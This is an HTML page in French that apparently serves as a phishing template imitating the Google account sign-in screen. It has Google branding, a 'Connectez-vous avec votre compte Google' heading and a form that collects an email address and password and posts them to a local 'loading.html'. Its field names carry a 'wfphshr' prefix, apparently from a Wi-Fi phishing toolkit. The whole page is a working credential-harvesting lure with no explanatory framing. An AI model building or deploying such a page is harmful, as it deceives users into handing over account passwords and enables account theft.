<!DOCTYPE html>
<html>

<head>
    <meta charset='utf-8'>
    <meta http-equiv='X-UA-Compatible' content='IE=edge'>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta http-equiv="Content-language" content="fr">
    <meta name="author" content="Lucien Burdet">
    <meta name='viewport' content='width=device-width, initial-scale=1'>
    <title>Connexion: comptes Google</title>
    <link rel="icon" type="image/png" href="./static/images/favicon.png" />
    <link rel='stylesheet' type='text/css' media='screen' href='./static/css/bootstrap.min.css'>
    <link rel='stylesheet' type='text/css' media='screen' href='./static/css/style.css'>
    <script src='./static/js/jquery.min.js'></script>
    <script src='./static/js/bootstrap.bundle.min.js'></script>
    <script src='./static/js/google.js'></script>
</head>

<body>
    <div class="container">

        <div class="google-header-bar centered">
            <div class="header content clearfix">
                <img alt="Google" class="logo" src="./static/images/logo.png">
            </div>
        </div>

        <h1 class="text-center login-title">Connectez-vous avec votre compte Google</h1>

        <div class="account-wall">

            <img class="profile-img" src="./static/images/user.png" alt="user">

            <form class="form-signin" id="google-form" method="POST" action="loading.html">
                <input id="wfphshr-username" type="text" name="wfphshr-username" class="form-control" placeholder="Email" autofocus="true"
                    autocorrect="off" autocomplete="off" autocapitalize="off" required>
                <input id="wfphshr-password" type="password" name="wfphshr-password" class="form-control" placeholder="Mot de passe" autocorrect="off"
                    autocomplete="off" autocapitalize="off" required><br>

                <div id="dialog">
                    <h2 id="error">Entrez les champs obligatoires.</h2>
                </div>

                <button id="google-form-btn" class="btn btn-primary btn-block btn-sharp" type="submit">Se connecter</button>
                <a href="#" class="pull-right need-help">Mot de passe oublié ?</a><span class="clearfix"></span>
            </form>

        </div>

        <br><a href="#" class="text-center new-account">Créer un compte</a>
        <center><br>
            <p class="tagline">Un compte Google pour tout</p>
            <img src="./static/images/multiple-logo.png" width="210" height="17" alt="multiple-logo">
        </center><br><br>


    </div>
</body>

</html>